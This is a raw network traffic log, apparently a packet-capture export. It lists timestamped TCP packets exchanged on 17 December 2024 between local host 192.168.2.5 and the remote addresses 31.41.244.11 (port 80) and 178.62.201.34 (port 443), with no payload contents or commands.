Dec 17, 2024 06:03:20.328566074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.329459906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.329616070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.329665899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.330539942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.330667973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.330739021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.331697941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.331743956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.331831932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.332731009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.332792044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.466562033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.466633081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.466722012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.467036009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.467170954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.467221022 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.468188047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.468241930 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.468251944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.469285965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.469340086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.469402075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.470397949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.470454931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.470475912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.470519066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.471497059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.471632004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.471681118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.472621918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.472745895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.472795963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.473730087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.473782063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.473843098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.474848032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.474900961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.474912882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.474944115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.476229906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.476264954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.476315975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.477077007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.477169037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.477238894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.478187084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.478255033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.478311062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.479290962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.479341030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.479363918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.480422020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.480475903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.480541945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.480592012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.481533051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.481662035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.481723070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.482660055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.482790947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.482855082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.483762980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.483894110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.483944893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.484883070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.484931946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.484994888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.485960007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.486011028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.486071110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.487088919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.487188101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.487189054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.487813950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.488189936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.488315105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.488365889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.489317894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.489505053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.489557028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.490437984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.490561008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.490609884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.491561890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.491611004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.491671085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.492665052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.492717981 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.492777109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.493778944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.493827105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.493886948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.494918108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.494967937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.495008945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.495055914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.495994091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.496126890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.496176958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.497133017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.497231007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.497246981 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.497282982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.498245955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.498303890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.498378038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.498426914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.499341965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.499393940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.499437094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.499485016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.500451088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.500503063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.500550032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.501575947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.501697063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.501753092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.502665043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.502785921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.502836943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.503823996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.503875971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.503952980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.504908085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.504962921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.505017042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.506025076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.506078959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.506155968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.507128000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.507184029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.507261038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.507317066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.508249044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.508342028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.508394957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.509356976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.509475946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.509529114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.510457039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.510509014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.510585070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.511600018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.511653900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.511703014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.511815071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.512687922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.512818098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.512872934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.513812065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.513864040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.513920069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.514949083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.515048981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.515100002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.516041994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.516170025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.516221046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.517189026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.517285109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.517338037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.518274069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.518326044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.518387079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.519377947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.519428968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.519432068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.519817114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.520492077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.520612955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.520663977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.521601915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.521758080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.521810055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.522710085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.522763968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.522825003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.523818970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.523857117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.523906946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.523947001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.523998976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.524921894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.526298046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.614795923 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:20.614881039 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:20.616699934 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:20.616729021 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:20.617167950 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:20.618396044 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:20.618438005 CET	49856	443	192.168.2.5	178.62.201.34
Dec 17, 2024 06:03:20.618520975 CET	443	49856	178.62.201.34	192.168.2.5
Dec 17, 2024 06:03:20.658919096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.658968925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.658976078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.659012079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.659229994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.659274101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.659379005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.659426928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.660360098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.660409927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.660474062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.660518885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.661484957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.661536932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.661621094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.661669970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.662580013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.662623882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.662754059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.662810087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.663683891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.663733959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.663815022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.663867950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.664788008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.664856911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.664928913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.664973974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.665939093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.665985107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.666050911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.666095018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.667021036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.667073011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.667148113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.667196035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.668131113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.668226004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.668247938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.668296099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.669358969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.669382095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.669414997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.669433117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.670344114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.670392036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.670461893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.670535088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.671479940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.671526909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.671555996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.671592951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.672583103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.672636032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.672668934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.672713041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.673682928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.673724890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.673785925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.673825979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.674782991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.674829960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.674884081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.674922943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.675900936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.675951004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.676024914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.676068068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.677023888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.677064896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.677133083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.677176952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.678136110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.678188086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.678248882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.678287983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.679300070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.679347038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.679371119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.679406881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.680392027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.680432081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.680471897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.680510998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.681476116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.681514978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.681591034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.681627035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.682611942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.682662010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.682730913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.682780027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.683700085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.683748960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.683821917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.683861971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.684811115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.684861898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.684938908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.685066938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.685923100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.685969114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.685986042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.686022997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.687045097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.687089920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.687149048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.687192917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.688184023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.688227892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.688302040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.688339949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.689310074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.689358950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.689393044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.689433098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.690505981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.690551996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.690640926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.690682888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.691509008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.691551924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.691668034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.691710949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.692625046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.692670107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.692754030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.692797899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.693751097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.693798065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.693860054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.693902016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.694842100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.694885015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.694942951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.694998980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.695959091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.696022034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.696105003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.696149111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.697063923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.697160959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.697216988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.697350979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.698179960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.698225975 CET	49850	80	192.168.2.5	31.41.244.11
